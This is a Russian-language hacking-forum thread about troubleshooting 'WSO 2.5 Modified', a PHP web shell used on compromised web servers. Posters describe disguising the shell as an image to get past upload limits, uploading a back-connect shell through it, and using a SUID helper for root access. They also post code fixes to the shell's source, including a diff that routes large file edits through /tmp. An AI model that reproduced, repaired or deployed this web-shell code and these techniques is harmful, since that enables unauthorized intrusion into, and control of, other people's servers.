WSO 2.5 Modified

Обсуждение в разделе «Избранное», начал(-а) randman, 6.08.2011.

  1. BigBear

    BigBear Well-Known Member
    Гарант - Escrow Service

    Регистрация:
    4.12.2008
    Сообщения:
    1 646
    Одобрения:
    666
    Репутация:
    833
    Он более мелкого размера.

    Это на случай обхода ограничения на объём загружаемого файла. - Можно закосить под "картинку" ну или ещё что-то что требуется...
     
    _________________________
  2. dean999

    dean999 New Member

    Регистрация:
    16.05.2012
    Сообщения:
    79
    Одобрения:
    1
    Репутация:
    0
    беда, подключивает шелл, где мануал найти чтоб обычный заработал через суид?wrapper.php,wso_root.php - в данный момент использую вот это, но тоже закачка например не работает) и т.д.
     
  3. b3

    b3 Moderator

    Регистрация:
    5.12.2004
    Сообщения:
    1 809
    Одобрения:
    577
    Репутация:
    187
    Вот хороший мануал php.net, мануальтесь на здоровье.
     
    _________________________
  4. Sharp.Net

    Sharp.Net New Member

    Регистрация:
    28.07.2012
    Сообщения:
    50
    Одобрения:
    3
    Репутация:
    1
    Я разрабатывал такой в своё время, в публику не выкладывал, только для своих. Но там была фишка в том - что куки ограниченного размера могут быть, и поэтому там надо было целую систему "многокуковой" (типо если не помещается, то надо делить искомое на части....) передачи данных делать...
     
  5. RaWaS

    RaWaS Member

    Регистрация:
    13.01.2010
    Сообщения:
    13
    Одобрения:
    6
    Репутация:
    -1
    Кто знает как в WSO закачать все отмеченные файлы либо файлы по списку?
     
  6. Qwert321

    Qwert321 Banned

    Регистрация:
    25.01.2009
    Сообщения:
    34
    Одобрения:
    0
    Репутация:
    0
    С самого начала непонятно, закачать или скачать?
    Если закачать(а так именно и написано) то про какой список имеется ввиду, или про отмеченные - ГДЕ?
    Но думаю имеется ввиду СКАЧАТЬ, то без упаковки никак.
     
  7. tmp

    tmp Banned

    Регистрация:
    10.03.2005
    Сообщения:
    428
    Одобрения:
    32
    Репутация:
    1
    Подскажите, плиз, этот шелл без привязки СУИДфайла может полноценно работать?
    Пока не поставил суидник, через это шелл закачал бекконнеткт, хочу переименовать - при нажатии кнопки первый раз перебросило меня в домашнюю директорию шелла. Целевой файл не переименовался. Попробовал в целевом файле изменить код - то же самое, пребрасывает в домашнюю диру, содержимое целевого файла не изменяется. Обычный WSO работает без проблем.

    UPD
    То же самое происходит и при привязке суидника. Рутовые файлы вроде бы можно редактить. но при сохранении перебрасывает в домашнюю диру, изменения не сохраняются.

    2UPD

    Посмотрел в адресную строку браузера - офигел:

    Code:
    wso2.php?text=User-agent%3A+*%0D%0ADisallow%3A+%2Fadmin_new%2F%0D%0ADisallow%3A+%2Fadmin%2..........
    3UPD
    Ошибка в яваскрипте. Вместо параметра var p2_ дублировался p1_ Решено.
     
    #87 tmp, 29.12.2012
    В последний раз редактировалось: 29.12.2012
  8. tmp

    tmp Banned

    Регистрация:
    10.03.2005
    Сообщения:
    428
    Одобрения:
    32
    Репутация:
    1
    Решилось что то с :

    ?
    Возникает при активном суиднике и редактировании файла больше ~20кБ
    Если файл меньший - то все ОК. Приходится юзать 2 шелла. Обычный и этот. Этим изменяю права. Обычным - редактирую файло. :)
     
  9. Vip77

    Vip77 Elder - Старейшина

    Регистрация:
    29.09.2012
    Сообщения:
    324
    Одобрения:
    47
    Репутация:
    19
    Make file: (Writeable)
    -(Writable)
     
  10. Faaax

    Faaax Banned

    Регистрация:
    30.08.2010
    Сообщения:
    429
    Одобрения:
    48
    Репутация:
    11
    блеать не удержался сори,но напиши в сорцах по грамотному тогда,если это задевает(***ню начинаете писать)
     
  11. Vip77

    Vip77 Elder - Старейшина

    Регистрация:
    29.09.2012
    Сообщения:
    324
    Одобрения:
    47
    Репутация:
    19
    Да ладно не расстраивайся :eek:
     
  12. Vip77

    Vip77 Elder - Старейшина

    Регистрация:
    29.09.2012
    Сообщения:
    324
    Одобрения:
    47
    Репутация:
    19
    WSO 2.5 Modified багнутый какой-то... На пример пытаюсь изменить дату, жму ок - ниче не пишет и переходит в каталог с файлами, смотрю, а дата таже стоит...
     
  13. herfleisch

    herfleisch Elder - Старейшина

    Регистрация:
    7.01.2009
    Сообщения:
    569
    Одобрения:
    75
    Репутация:
    13
    Права-то на запись имеются?
     
  14. Vip77

    Vip77 Elder - Старейшина

    Регистрация:
    29.09.2012
    Сообщения:
    324
    Одобрения:
    47
    Репутация:
    19
    Конечно, попробовал изменить дату с wso 2.4 все спокойно меняется
    Если бы не было прав, то писало бы Fail! а так вообще ничего не пишет, а перекидывает в файловый менеджер и в адресной строке - shell.php?touch=2012-12-01 14:22:54
    Изменить имя файла тоже не получается... просто прописывается в адресной строке
    shell.php?name=измененноеимя.php
    Пытаюсь изменить содержимое файла - не изменяется в адресной строке - shell.php?text=blablabla
     
    #94 Vip77, 6.01.2013
    В последний раз редактировалось: 6.01.2013
  15. Vip77

    Vip77 Elder - Старейшина

    Регистрация:
    29.09.2012
    Сообщения:
    324
    Одобрения:
    47
    Репутация:
    19
    Неужели только у меня такое...
     
  16. tmp

    tmp Banned

    Регистрация:
    10.03.2005
    Сообщения:
    428
    Одобрения:
    32
    Репутация:
    1
    А файлы редактировать можешь? Исправлял в исходнике яваскрипт? Там ошибка, в оригинальном файле.
     
    #96 tmp, 6.01.2013
    В последний раз редактировалось: 6.01.2013
  17. Vip77

    Vip77 Elder - Старейшина

    Регистрация:
    29.09.2012
    Сообщения:
    324
    Одобрения:
    47
    Репутация:
    19
    Файлы редактировать через этот шелл не могу. А права есть. И где там ошибка в яваскрипте не знаю... Как выложили так и юзал.
     
  18. tmp

    tmp Banned

    Регистрация:
    10.03.2005
    Сообщения:
    428
    Одобрения:
    32
    Репутация:
    1
    Строки 231 и 232

    Code:
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';    
     var p1_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';

    поменяй строку 232
    на

    Code:
        var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p2_ должно быть

    ЗЫ
    Но проблему с редактированием файлов больше 20 кБ так и не решил
     
    Это одобряет 1 пользователь.
  19. Vip77

    Vip77 Elder - Старейшина

    Регистрация:
    29.09.2012
    Сообщения:
    324
    Одобрения:
    47
    Репутация:
    19
    О спасибо, этим решилось много проблем
     
  20. Jer1cho

    Jer1cho Member

    Регистрация:
    6.06.2008
    Сообщения:
    212
    Одобрения:
    66
    Репутация:
    10
    Проблема в том, что к suid'нику передается сильно длинный параметр. И запрос выдает "Argument list too long".

    Решение которое пришло первым в голову (на сколько стабильно работает не знаю):

    PHP:

    diff 
    --git a/var/www/orig.php b/var/www/mod.php
    index eb36bb8
    ..0aebf2c 100644
    --- a/var/www/orig.php
    +++ b/var/www/mod.php
    @@ -104,+104,13 @@ if(get_magic_quotes_gpc()) {
     
     
     if (!empty(
    $_COOKIE[md5($_SERVER['HTTP_HOST']).'sname']) && !empty($_COOKIE[md5($_SERVER['HTTP_HOST']).'spass']) && $_COOKIE[md5($_SERVER['HTTP_HOST']).'sname'] != '' && !defined('suid')) {
    +if(
    $_POST['p2'] == 'edit' && !empty($_POST['p3'])){
    +    
    $tmp_path '/tmp/'.str_shuffle('0123456789abcdefghijklmnopqrstuvwxyz');
    +
    +    
    file_put_contents($tmp_path$_POST['p3']) or die('/tmp/ isn\'t writable.');
    +
    +    
    $_POST['p3'] = $tmp_path;
    +}
     
     echo 
    wsoEx($_COOKIE[md5($_SERVER['HTTP_HOST']).'sname'].' '.$_COOKIE[md5($_SERVER['HTTP_HOST']).'spass']. ' "'.$_COOKIE[md5($_SERVER['HTTP_HOST']).'sphp'].' '.$_SERVER['SCRIPT_FILENAME'].' \''.addslashes($_COOKIE[md5($_SERVER['HTTP_HOST'])]).'\'  '.'\''.base64_encode(serialize($GLOBALS)).'\'"');
     
    @@ -
    963,13 +970,14 @@ function actionFilesTools() {
                     echo 
    'File isn\'t writeable';
                     break;
                 }
    +
                 if( !empty(
    $_POST['p3']) ) {
                     
    $time = @filemtime($_POST['p1']);
    -                
    $_POST['p3'] = substr($_POST['p3'],1);
                     
    $fp = @fopen($_POST['p1'],"w");
                     if(
    $fp) {
    -                    @
    fwrite($fp,$_POST['p3']);
    +                    @
    fwrite($fp,substr((defined('suid') ? file_get_contents($_POST['p3']) : $_POST['p3']),1));
                         @
    fclose($fp);
    +                    if(
    defined('suid')) @unlink($_POST['p3']);
                         echo 
    'Saved!<br><script>p3_="";</script>';
                         @
    touch($_POST['p1'],$time,$time);
                     }

    https://gist.github.com/c52be259912a3123b2f1

    Естественно нужны права на запись в /tmp/, можно было и иначе, просто переносить из /tmp/ используя mv, но делать лень.


    Еще как вариант можно разделять запросы на части, но это будет сильно затратно в плане выделения памяти.
     
    #100 Jer1cho, 9.01.2013
    В последний раз редактировалось: 9.01.2013
    Это одобряет 1 пользователь.